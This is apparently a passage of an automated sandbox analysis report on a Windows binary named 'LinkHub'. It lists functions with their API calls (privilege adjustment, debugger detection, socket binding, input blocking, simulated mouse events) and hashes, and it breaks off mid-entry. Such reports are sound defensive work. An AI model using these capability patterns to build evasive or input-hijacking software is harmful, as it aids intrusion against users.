                                                                                        • Associated: 00000024.00000002.2112924055.00000000002C3000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2112980189.00000000002CD000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2113005251.00000000002D5000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_36_2_200000_LinkHub.jbxd
                                                                                        Similarity
                                                                                        • API ID: Color$Proc
                                                                                        • String ID: (-
                                                                                        • API String ID: 929743424-4239615555
                                                                                        • Opcode ID: e4740a60fff0e61197e34afbd66cf08c229be26ffa339dbb025a08eaed986182
                                                                                        • Instruction ID: 6e50aac70a64bd437454502b7063b7d0cf50110e77d850407c38c77383b0e07f
                                                                                        • Opcode Fuzzy Hash: e4740a60fff0e61197e34afbd66cf08c229be26ffa339dbb025a08eaed986182
                                                                                        • Instruction Fuzzy Hash: AD8126B0134201FAE72DAF3C9C9CE7FA55EEB42314B12014BF142C65D3C9999E799276
                                                                                        Function 00273A0E Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 60COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • CreateStreamOnHGlobal.OLE32(00000000,00000001,?,?,?,?,?,002456C2,?,?,00000000,00000000), ref: 00273A1E
                                                                                        • FindResourceExW.KERNEL32(?,0000000A,SCRIPT,00000000,?,?,002456C2,?,?,00000000,00000000), ref: 00273A35
                                                                                        • LoadResource.KERNEL32(?,00000000,?,?,002456C2,?,?,00000000,00000000,?,?,?,?,?,?,002066CE), ref: 00273A45
                                                                                        • SizeofResource.KERNEL32(?,00000000,?,?,002456C2,?,?,00000000,00000000,?,?,?,?,?,?,002066CE), ref: 00273A56
                                                                                        • LockResource.KERNEL32(002456C2,?,?,002456C2,?,?,00000000,00000000,?,?,?,?,?,?,002066CE,?), ref: 00273A65
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000024.00000002.2112868306.0000000000201000.00000020.00000001.01000000.00000012.sdmp, Offset: 00200000, based on PE: true
                                                                                        • Associated: 00000024.00000002.2112846436.0000000000200000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2112924055.000000000029D000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2112924055.00000000002C3000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2112980189.00000000002CD000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2113005251.00000000002D5000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_36_2_200000_LinkHub.jbxd
                                                                                        Similarity
                                                                                        • API ID: Resource$CreateFindGlobalLoadLockSizeofStream
                                                                                        • String ID: SCRIPT
                                                                                        • API String ID: 3051347437-3967369404
                                                                                        • Opcode ID: 267e6efe026312a46014c2a49405ba9b6832575dc1ed47fc61ba24d3765759c4
                                                                                        • Instruction ID: e662794ab1a932a09d7f1e89552e2e1a1e954fd03ca924c4236ac49927e79c18
                                                                                        • Opcode Fuzzy Hash: 267e6efe026312a46014c2a49405ba9b6832575dc1ed47fc61ba24d3765759c4
                                                                                        • Instruction Fuzzy Hash: 4C118E71600701BFE721CF25EC4AF67BBB9EBC5B40F14826DB406D6150DB71ED00AA60
                                                                                        Function 002620AA Relevance: 9.1, APIs: 6, Instructions: 68memoryCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                          • Part of subcall function 00261900: GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 00261916
                                                                                          • Part of subcall function 00261900: GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 00261922
                                                                                          • Part of subcall function 00261900: GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 00261931
                                                                                          • Part of subcall function 00261900: HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 00261938
                                                                                          • Part of subcall function 00261900: GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 0026194E
                                                                                        • GetLengthSid.ADVAPI32(?,00000000,00261C81), ref: 002620FB
                                                                                        • GetProcessHeap.KERNEL32(00000008,00000000), ref: 00262107
                                                                                        • HeapAlloc.KERNEL32(00000000), ref: 0026210E
                                                                                        • CopySid.ADVAPI32(00000000,00000000,?), ref: 00262127
                                                                                        • GetProcessHeap.KERNEL32(00000000,00000000,00261C81), ref: 0026213B
                                                                                        • HeapFree.KERNEL32(00000000), ref: 00262142
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000024.00000002.2112868306.0000000000201000.00000020.00000001.01000000.00000012.sdmp, Offset: 00200000, based on PE: true
                                                                                        • Associated: 00000024.00000002.2112846436.0000000000200000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2112924055.000000000029D000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2112924055.00000000002C3000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2112980189.00000000002CD000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2113005251.00000000002D5000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_36_2_200000_LinkHub.jbxd
                                                                                        Similarity
                                                                                        • API ID: Heap$Process$AllocInformationToken$CopyErrorFreeLastLength
                                                                                        • String ID:
                                                                                        • API String ID: 3008561057-0
                                                                                        • Opcode ID: a912cb91e1c080f598c7a4f71bebb88338b3bb1cff583f23f664cfb2c3157608
                                                                                        • Instruction ID: 2cdf70030090380cd77540d9dcdce909e9a3b19666b10d3afdc7af2b12decce7
                                                                                        • Opcode Fuzzy Hash: a912cb91e1c080f598c7a4f71bebb88338b3bb1cff583f23f664cfb2c3157608
                                                                                        • Instruction Fuzzy Hash: C6110072520605FFDF108F64DD08BAE7BB9EF42356F144059E94997120C331A999DBA0
                                                                                        Function 0027A570 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 119filesleepCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                          • Part of subcall function 0020B329: _wcslen.LIBCMT ref: 0020B333
                                                                                        • FindFirstFileW.KERNEL32(00000001,?,*.*,?,?,00000000,00000000), ref: 0027A5BD
                                                                                        • FindClose.KERNEL32(00000000,?,00000000,00000000), ref: 0027A6D0
                                                                                          • Part of subcall function 002742B9: GetInputState.USER32 ref: 00274310
                                                                                          • Part of subcall function 002742B9: PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 002743AB
                                                                                        • Sleep.KERNEL32(0000000A,?,00000000,00000000), ref: 0027A5ED
                                                                                        • FindNextFileW.KERNEL32(?,?,?,00000000,00000000), ref: 0027A6BA
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000024.00000002.2112868306.0000000000201000.00000020.00000001.01000000.00000012.sdmp, Offset: 00200000, based on PE: true
                                                                                        • Associated: 00000024.00000002.2112846436.0000000000200000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2112924055.000000000029D000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2112924055.00000000002C3000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2112980189.00000000002CD000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2113005251.00000000002D5000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_36_2_200000_LinkHub.jbxd
                                                                                        Similarity
                                                                                        • API ID: Find$File$CloseFirstInputMessageNextPeekSleepState_wcslen
                                                                                        • String ID: *.*
                                                                                        • API String ID: 1972594611-438819550
                                                                                        • Opcode ID: 27ede74142524ecc912518acfb45dba07aa81d298ed2c036409a22d9ef2bdecb
                                                                                        • Instruction ID: f8f15547556d7f7c348e9fd3a165e2ad5ceb53e2885ca544698d26be9cc2478f
                                                                                        • Opcode Fuzzy Hash: 27ede74142524ecc912518acfb45dba07aa81d298ed2c036409a22d9ef2bdecb
                                                                                        • Instruction Fuzzy Hash: B041987191120A9FCF15EF64CC49EEEBBB8EF45310F248056E809A3191EB309E64DF61
                                                                                        Function 00282263 Relevance: 7.7, APIs: 5, Instructions: 153networkCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                          • Part of subcall function 00283AAB: inet_addr.WSOCK32(?,?,?,?,?,00000000), ref: 00283AD7
                                                                                          • Part of subcall function 00283AAB: _wcslen.LIBCMT ref: 00283AF8
                                                                                        • socket.WSOCK32(00000002,00000002,00000011,?,?,00000000), ref: 002822BA
                                                                                        • WSAGetLastError.WSOCK32 ref: 002822E1
                                                                                        • bind.WSOCK32(00000000,?,00000010), ref: 00282338
                                                                                        • WSAGetLastError.WSOCK32 ref: 00282343
                                                                                        • closesocket.WSOCK32(00000000), ref: 00282372
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000024.00000002.2112868306.0000000000201000.00000020.00000001.01000000.00000012.sdmp, Offset: 00200000, based on PE: true
                                                                                        • Associated: 00000024.00000002.2112846436.0000000000200000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2112924055.000000000029D000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2112924055.00000000002C3000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2112980189.00000000002CD000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2113005251.00000000002D5000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_36_2_200000_LinkHub.jbxd
                                                                                        Similarity
                                                                                        • API ID: ErrorLast$_wcslenbindclosesocketinet_addrsocket
                                                                                        • String ID:
                                                                                        • API String ID: 1601658205-0
                                                                                        • Opcode ID: df8d2b03bd820e5c0a70548ab6c922d1e7577799c1f86544d21ddedf3a80e249
                                                                                        • Instruction ID: 524bb342b30bb09815445233f5d8703ed1427484f66039ea7b2d9dea6fea2123
                                                                                        • Opcode Fuzzy Hash: df8d2b03bd820e5c0a70548ab6c922d1e7577799c1f86544d21ddedf3a80e249
                                                                                        • Instruction Fuzzy Hash: 2C51E275A10200AFE710AF24D886F6A77E5AB44718F088498F9459F3C3D771AC628FE1
                                                                                        Function 002926DD Relevance: 7.6, APIs: 5, Instructions: 83windowCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000024.00000002.2112868306.0000000000201000.00000020.00000001.01000000.00000012.sdmp, Offset: 00200000, based on PE: true
                                                                                        • Associated: 00000024.00000002.2112846436.0000000000200000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2112924055.000000000029D000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2112924055.00000000002C3000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2112980189.00000000002CD000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2113005251.00000000002D5000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_36_2_200000_LinkHub.jbxd
                                                                                        Similarity
                                                                                        • API ID: Window$EnabledForegroundIconicVisibleZoomed
                                                                                        • String ID:
                                                                                        • API String ID: 292994002-0
                                                                                        • Opcode ID: 40dc57307a740b4cf8d435cb81e7898b757c6e9467dc8a080d573d461df078e4
                                                                                        • Instruction ID: aee3fe2aa86f2423d07c211ef93571771ddf0478426fb3e43b04f48cf0cd7911
                                                                                        • Opcode Fuzzy Hash: 40dc57307a740b4cf8d435cb81e7898b757c6e9467dc8a080d573d461df078e4
                                                                                        • Instruction Fuzzy Hash: B8212731710211EFDB109F66D844B9ABBE8EF84310F198069E8499B252C771EC56CB90
                                                                                        Function 0027D889 Relevance: 6.1, APIs: 4, Instructions: 75filenetworkCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • InternetReadFile.WININET(?,?,00000400,?), ref: 0027D8CE
                                                                                        • GetLastError.KERNEL32(?,00000000), ref: 0027D92F
                                                                                        • SetEvent.KERNEL32(?,?,00000000), ref: 0027D943
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000024.00000002.2112868306.0000000000201000.00000020.00000001.01000000.00000012.sdmp, Offset: 00200000, based on PE: true
                                                                                        • Associated: 00000024.00000002.2112846436.0000000000200000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2112924055.000000000029D000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2112924055.00000000002C3000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2112980189.00000000002CD000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2113005251.00000000002D5000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_36_2_200000_LinkHub.jbxd
                                                                                        Similarity
                                                                                        • API ID: ErrorEventFileInternetLastRead
                                                                                        • String ID:
                                                                                        • API String ID: 234945975-0
                                                                                        • Opcode ID: 59f5bc8645cb67b9cdbbf72c8bc161a0cca6a9171ecc44656490279c861a57bb
                                                                                        • Instruction ID: 223d52ab43ebece2219604cf5e002b40e02a0459f2d4b7fd40da75a8e9525c9b
                                                                                        • Opcode Fuzzy Hash: 59f5bc8645cb67b9cdbbf72c8bc161a0cca6a9171ecc44656490279c861a57bb
                                                                                        • Instruction Fuzzy Hash: 84219071920706EBE7209FA5D948BABB7F8AF40314F10841EE64A92141E770EA559F54
                                                                                        Function 0026E472 Relevance: 6.0, APIs: 4, Instructions: 29filestringCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • lstrlenW.KERNEL32(?,002446AC), ref: 0026E482
                                                                                        • GetFileAttributesW.KERNEL32(?), ref: 0026E491
                                                                                        • FindFirstFileW.KERNEL32(?,?), ref: 0026E4A2
                                                                                        • FindClose.KERNEL32(00000000), ref: 0026E4AE
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000024.00000002.2112868306.0000000000201000.00000020.00000001.01000000.00000012.sdmp, Offset: 00200000, based on PE: true
                                                                                        • Associated: 00000024.00000002.2112846436.0000000000200000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2112924055.000000000029D000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2112924055.00000000002C3000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2112980189.00000000002CD000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2113005251.00000000002D5000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_36_2_200000_LinkHub.jbxd
                                                                                        Similarity
                                                                                        • API ID: FileFind$AttributesCloseFirstlstrlen
                                                                                        • String ID:
                                                                                        • API String ID: 2695905019-0
                                                                                        • Opcode ID: 708fbf17da793693a9ec630ff4bef2511964963a5729cc25360ff230de5207dd
                                                                                        • Instruction ID: d39f34a8ce97f56c5a70ceeb0873953569dda56504533e1a32e6470a9fcb2bee
                                                                                        • Opcode Fuzzy Hash: 708fbf17da793693a9ec630ff4bef2511964963a5729cc25360ff230de5207dd
                                                                                        • Instruction Fuzzy Hash: DFF0E53982091057D6106B3CFC0D8AB776DAE02335B904706FC36C20F0DB789DE5A695
                                                                                        Function 0025E5F4 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 17timeCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000024.00000002.2112868306.0000000000201000.00000020.00000001.01000000.00000012.sdmp, Offset: 00200000, based on PE: true
                                                                                        • Associated: 00000024.00000002.2112846436.0000000000200000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2112924055.000000000029D000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2112924055.00000000002C3000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2112980189.00000000002CD000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2113005251.00000000002D5000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_36_2_200000_LinkHub.jbxd
                                                                                        Similarity
                                                                                        • API ID: LocalTime
                                                                                        • String ID: %.3d$X64
                                                                                        • API String ID: 481472006-1077770165
                                                                                        • Opcode ID: 55ea1b234804885108fef69f42592c175fbed79956bdfed5fd42501ed3db05e3
                                                                                        • Instruction ID: 1b42c00ee7e97c3dbea52f55ff96b88cb921576664bd0836468115992246d7ef
                                                                                        • Opcode Fuzzy Hash: 55ea1b234804885108fef69f42592c175fbed79956bdfed5fd42501ed3db05e3
                                                                                        • Instruction Fuzzy Hash: 15D012B1C38118D6CFC89B909D88DB973BCBB28341F628456FD0691001E6B09A6CAB25
                                                                                        Function 00232992 Relevance: 4.6, APIs: 3, Instructions: 78COMMONLIBRARYCODE
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • IsDebuggerPresent.KERNEL32(?,?,?,?,?,00000000), ref: 00232A8A
                                                                                        • SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,00000000), ref: 00232A94
                                                                                        • UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,?,00000000), ref: 00232AA1
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000024.00000002.2112868306.0000000000201000.00000020.00000001.01000000.00000012.sdmp, Offset: 00200000, based on PE: true
                                                                                        • Associated: 00000024.00000002.2112846436.0000000000200000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2112924055.000000000029D000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2112924055.00000000002C3000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2112980189.00000000002CD000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2113005251.00000000002D5000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_36_2_200000_LinkHub.jbxd
                                                                                        Similarity
                                                                                        • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                                                                        • String ID:
                                                                                        • API String ID: 3906539128-0
                                                                                        • Opcode ID: 4e4cdfb9ce27e5bdfb0e8fbc0c9c994d64a410c5f8a1ad999ceace784ba7e37e
                                                                                        • Instruction ID: 6ab012b80b1cd7b478b83b5e544aa27acfe69b0de943d66023868d92b461489b
                                                                                        • Opcode Fuzzy Hash: 4e4cdfb9ce27e5bdfb0e8fbc0c9c994d64a410c5f8a1ad999ceace784ba7e37e
                                                                                        • Instruction Fuzzy Hash: 0531B57591122DABCB21DF68DD8979DBBB8BF08310F5042DAE80CA7261E7309F958F45
                                                                                        Function 00262010 Relevance: 4.6, APIs: 3, Instructions: 68COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                          • Part of subcall function 0022014B: __CxxThrowException@8.LIBVCRUNTIME ref: 002209D8
                                                                                          • Part of subcall function 0022014B: __CxxThrowException@8.LIBVCRUNTIME ref: 002209F5
                                                                                        • LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 0026205A
                                                                                        • AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00262087
                                                                                        • GetLastError.KERNEL32 ref: 00262097
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000024.00000002.2112868306.0000000000201000.00000020.00000001.01000000.00000012.sdmp, Offset: 00200000, based on PE: true
                                                                                        • Associated: 00000024.00000002.2112846436.0000000000200000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2112924055.000000000029D000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2112924055.00000000002C3000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2112980189.00000000002CD000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2113005251.00000000002D5000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_36_2_200000_LinkHub.jbxd
                                                                                        Similarity
                                                                                        • API ID: Exception@8Throw$AdjustErrorLastLookupPrivilegePrivilegesTokenValue
                                                                                        • String ID:
                                                                                        • API String ID: 577356006-0
                                                                                        • Opcode ID: f8e4ff29551ffd174d7a44dd0ad9215cf1adb2661ca7552f1986c83e26765291
                                                                                        • Instruction ID: a1d5bb0dc0df06afa9a5b0e2aec5dad09e728b58fa3930ed54e5c0640abeba7d
                                                                                        • Opcode Fuzzy Hash: f8e4ff29551ffd174d7a44dd0ad9215cf1adb2661ca7552f1986c83e26765291
                                                                                        • Instruction Fuzzy Hash: 8811BFB1424205FFD7189F54ECC6E6BB7B8EB44710B20841EF04657251DB70BC95CA24
                                                                                        Function 0025E652 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 10COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • GetUserNameW.ADVAPI32(?,?), ref: 0025E664
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000024.00000002.2112868306.0000000000201000.00000020.00000001.01000000.00000012.sdmp, Offset: 00200000, based on PE: true
                                                                                        • Associated: 00000024.00000002.2112846436.0000000000200000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2112924055.000000000029D000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2112924055.00000000002C3000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2112980189.00000000002CD000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2113005251.00000000002D5000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_36_2_200000_LinkHub.jbxd
                                                                                        Similarity
                                                                                        • API ID: NameUser
                                                                                        • String ID: X64
                                                                                        • API String ID: 2645101109-893830106
                                                                                        • Opcode ID: 1e8bdd45a2f311ab4d928ab87ed748be0fa5cb12e436e10cef424f86566288d9
                                                                                        • Instruction ID: 66d4eecb9af44418529e1f1e440fffffd146808ec64c1acf75d36f21b2e0ad59
                                                                                        • Opcode Fuzzy Hash: 1e8bdd45a2f311ab4d928ab87ed748be0fa5cb12e436e10cef424f86566288d9
                                                                                        • Instruction Fuzzy Hash: 34D0C9B482511DEACF80CF50EC88DDD73BCBB14304F110652F546A2000D77096489F14
                                                                                        Function 002741FA Relevance: 3.0, APIs: 2, Instructions: 33windowCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • GetLastError.KERNEL32(00000000,?,00000FFF,00000000,?,?,?,002852EE,?,?,00000035,?), ref: 00274229
                                                                                        • FormatMessageW.KERNEL32(00001000,00000000,?,00000000,?,00000FFF,00000000,?,?,?,002852EE,?,?,00000035,?), ref: 00274239
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000024.00000002.2112868306.0000000000201000.00000020.00000001.01000000.00000012.sdmp, Offset: 00200000, based on PE: true
                                                                                        • Associated: 00000024.00000002.2112846436.0000000000200000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2112924055.000000000029D000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2112924055.00000000002C3000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2112980189.00000000002CD000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2113005251.00000000002D5000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_36_2_200000_LinkHub.jbxd
                                                                                        Similarity
                                                                                        • API ID: ErrorFormatLastMessage
                                                                                        • String ID:
                                                                                        • API String ID: 3479602957-0
                                                                                        • Opcode ID: cb44f35616fe102573b642bf9312b90be90f8d844de53a5dd930726b6df5e3d9
                                                                                        • Instruction ID: 5d05767c1e620f007bf2fc8f932a0e924bca6ba8be6a1ce191db2b078a4a9632
                                                                                        • Opcode Fuzzy Hash: cb44f35616fe102573b642bf9312b90be90f8d844de53a5dd930726b6df5e3d9
                                                                                        • Instruction Fuzzy Hash: 28F0E5306203256AE7206766AC4DFEB766DEFC5761F000176F909D2182DA709910CAB0
                                                                                        Function 00261A0B Relevance: 3.0, APIs: 2, Instructions: 24COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,00261B48), ref: 00261A20
                                                                                        • CloseHandle.KERNEL32(?,?,00261B48), ref: 00261A35
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000024.00000002.2112868306.0000000000201000.00000020.00000001.01000000.00000012.sdmp, Offset: 00200000, based on PE: true
                                                                                        • Associated: 00000024.00000002.2112846436.0000000000200000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2112924055.000000000029D000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2112924055.00000000002C3000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2112980189.00000000002CD000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2113005251.00000000002D5000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_36_2_200000_LinkHub.jbxd
                                                                                        Similarity
                                                                                        • API ID: AdjustCloseHandlePrivilegesToken
                                                                                        • String ID:
                                                                                        • API String ID: 81990902-0
                                                                                        • Opcode ID: 746cb79252c83d9e54799b324fa620467519834b16f671170b2a7a6d30c0c28d
                                                                                        • Instruction ID: 450204a7fec953f33ba35dc209b3253c976521704f0fa4b710a7059b8842de0e
                                                                                        • Opcode Fuzzy Hash: 746cb79252c83d9e54799b324fa620467519834b16f671170b2a7a6d30c0c28d
                                                                                        • Instruction Fuzzy Hash: DFE01A72014610BFE7252B60FC0AE76B7A9EB04311F14881EB49580471DA626CB0EE54
                                                                                        Function 0027F4FF Relevance: 1.5, APIs: 1, Instructions: 25keyboardCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • BlockInput.USER32(00000001), ref: 0027F51A
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000024.00000002.2112868306.0000000000201000.00000020.00000001.01000000.00000012.sdmp, Offset: 00200000, based on PE: true
                                                                                        • Associated: 00000024.00000002.2112846436.0000000000200000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2112924055.000000000029D000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2112924055.00000000002C3000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2112980189.00000000002CD000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2113005251.00000000002D5000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_36_2_200000_LinkHub.jbxd
                                                                                        Similarity
                                                                                        • API ID: BlockInput
                                                                                        • String ID:
                                                                                        • API String ID: 3456056419-0
                                                                                        • Opcode ID: c6ec94d50a7612c5612f5151954b78beb5843198b65ed0fc21b96148235fd3d0
                                                                                        • Instruction ID: 00b9a306f3497db5bf433b2694ad6a9dbed16ef1f656593eca79729eaa9050b6
                                                                                        • Opcode Fuzzy Hash: c6ec94d50a7612c5612f5151954b78beb5843198b65ed0fc21b96148235fd3d0
                                                                                        • Instruction Fuzzy Hash: 49E048312242055FC7509F69E404956F7DCAFA4761F048426F849C7352D670F9508FA1
                                                                                        Function 0026EC6C Relevance: 1.5, APIs: 1, Instructions: 24COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • mouse_event.USER32(00000002,00000000,00000000,00000000,00000000), ref: 0026EC95
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000024.00000002.2112868306.0000000000201000.00000020.00000001.01000000.00000012.sdmp, Offset: 00200000, based on PE: true
                                                                                        • Associated: 00000024.00000002.2112846436.0000000000200000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2112924055.000000000029D000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2112924055.00000000002C3000.00000002.00000001.01000000.00000012.sdmpDownload File
